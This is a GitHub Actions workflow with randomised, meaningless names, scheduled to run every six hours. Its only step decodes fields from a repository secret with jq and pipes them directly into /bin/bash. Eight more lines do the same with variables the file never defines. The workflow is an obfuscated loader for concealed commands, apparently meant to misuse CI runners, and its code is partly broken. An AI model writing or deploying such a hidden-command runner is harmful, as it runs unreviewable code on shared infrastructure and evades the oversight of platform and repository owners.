name: guyindu0918
on:
  workflow_dispatch:
  schedule:
    - cron: '45 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guyindu0918
        env:
          op4394: ${{ secrets.op4394 }}
        run: |
          echo $op4394 | jq -r .kh9 | /bin/bash
          echo $wcscn19 | jq -r .gwipc1 | /bin/bash
          echo $ku58 | jq -r .g8 | /bin/bash
          echo $ccc53031 | jq -r .n54242 | /bin/bash
          echo $plp6 | jq -r .lvab6064 | /bin/bash
          echo $spa80312 | jq -r .qepld3 | /bin/bash
          echo $y926 | jq -r .mjfbc7687 | /bin/bash
          echo $sxg1 | jq -r .qq5014 | /bin/bash
          echo $clo98 | jq -r .y180 | /bin/bash

